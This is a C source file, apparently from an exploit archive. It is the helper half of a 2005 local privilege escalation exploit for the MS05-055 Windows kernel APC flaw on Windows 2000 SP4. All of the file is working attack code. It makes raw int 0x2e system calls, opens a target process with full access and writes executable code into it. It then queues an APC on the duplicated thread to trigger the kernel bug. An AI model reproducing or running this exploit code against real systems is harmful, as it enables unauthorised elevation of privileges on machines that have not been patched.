helper.c

Folder: Microsoft MS05-055 exploit (language: C)
/*
	MS05-055 Windows Kernel APC Data-Free Local Privilege Escalation Vulnerability Exploit
			Created by SoBeIt
					12.25.2005

	Helper file of exploit

	Tested on:

	Windows 2000 PRO SP4 Chinese
	Windows 2000 PRO SP4 Rollup 1 Chinese
	Windows 2000 PRO SP4 English
	Windows 2000 PRO SP4 Rollup 1 English

	Usage: ms05-055.exe helper.exe
	(ms05-055.exe launches this helper and passes it a thread handle and a process id on the command line)
*/


#include <stdio.h>
#include <windows.h>

#define NTSTATUS	ULONG

typedef VOID (NTAPI *PKNORMAL_ROUTINE)(PVOID ApcContext, PVOID Argument1, PVOID Argument2);

/*
	Direct system-call stubs (int 0x2e). The service numbers 0x9e and 0x0c are
	hard-coded for the Windows 2000 builds listed above and differ on other
	Windows versions. Both are stdcall (NTAPI): the callee pops its own arguments,
	so the declarations must carry NTAPI or the caller's stack ends up unbalanced.
*/
__declspec(naked)
NTSTATUS
NTAPI
ZwQueueApcThread(
	HANDLE hThread,
	PKNORMAL_ROUTINE ApcRoutine,
	PVOID ApcContext,
	PVOID Argument1,
	PVOID Argument2)
{
	__asm
	{
		mov eax, 0x9e
		lea edx, [esp+4]
		int 0x2e
		ret 0x14
	}
}

__declspec(naked)
NTSTATUS
NTAPI
ZwAlertThread(
	HANDLE hThread)
{
	__asm
	{
		mov eax, 0x0c
		lea edx, [esp+4]
		int 0x2e
		ret 0x4
	}
}

/* Empty APC routine; its code bytes are copied into the target process below. */
VOID NTAPI ApcProc(PVOID ApcContext, PVOID Argument1, PVOID Argument2)
{
}

int main(int argc, char *argv[])
{
	HANDLE	hTargetThread, hTargetProcess, hThread;
	int		ProcessId;
	PVOID	pApcProc;

	if(argc != 3)
	{
		printf(" Usage: helper.exe <thread handle> <process id> (normally launched by ms05-055.exe). \n");
		return 1;
	}

	/* argv[1]: thread handle value valid inside the target process; argv[2]: target process id */
	hTargetThread = (HANDLE)atoi(argv[1]);
	ProcessId = atoi(argv[2]);
	printf("Got thread handle:%x, Got process id:%x\n", (unsigned)hTargetThread, (unsigned)ProcessId);

	hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
	printf("Process handle:%x\n", (unsigned)hTargetProcess);
	if(hTargetProcess == NULL)
	{
		printf("Open process failed: %lu\n", GetLastError());
		return 1;
	}

	/* Bring the target's thread handle into this process so the syscalls below can use it. */
	if(!DuplicateHandle(hTargetProcess, hTargetThread, GetCurrentProcess(),  &hThread, 0, FALSE, DUPLICATE_SAME_ACCESS))
	{
		printf("Duplicate handle failed: %lu\n", GetLastError());
		return 1;
	}

	/* Allocate an executable page in the target and copy the bytes of ApcProc into it. */
	if((pApcProc = VirtualAllocEx(hTargetProcess, 0, 1024*4, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL)
	{
		printf("Allocate remote memory failed: %lu\n", GetLastError());
		return 1;
	}

	if(!WriteProcessMemory(hTargetProcess, pApcProc, &ApcProc, 1024*4, 0))
	{
		printf("Write remote memory failed: %lu\n", GetLastError());
		return 1;
	}

	/* Alert the target thread and queue a user-mode APC pointing at the copied routine. */
	ZwAlertThread(hThread);
	ZwQueueApcThread(hThread, (PKNORMAL_ROUTINE)pApcProc, NULL, NULL, NULL);
	CloseHandle(hTargetProcess);
	CloseHandle(hThread);
	printf("Now terminating process.\n");
	ExitProcess(0);
}
